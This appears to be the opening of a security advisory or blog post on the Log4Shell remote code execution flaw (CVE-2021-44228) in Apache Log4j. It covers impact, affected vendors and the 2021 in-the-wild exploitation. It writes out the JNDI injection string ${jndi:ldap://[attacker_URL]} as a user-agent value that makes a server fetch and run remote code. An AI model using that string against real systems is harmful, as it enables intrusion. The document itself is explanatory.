Apache Log4j Remote Code Execution (CVE-2021-44228)
Introduction Log4Shell is a severe critical vulnerability affecting many versions of the Apache Log4j application . The vulnerability allows unauthenticated remote code execution . Attackers can take advantage of it by modifying their browser’s user-agent string to ${jndi:ldap://[attacker_URL]} format. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare . On Dec. 9, 2021 , a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild . Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload . Due to the discovery of this ...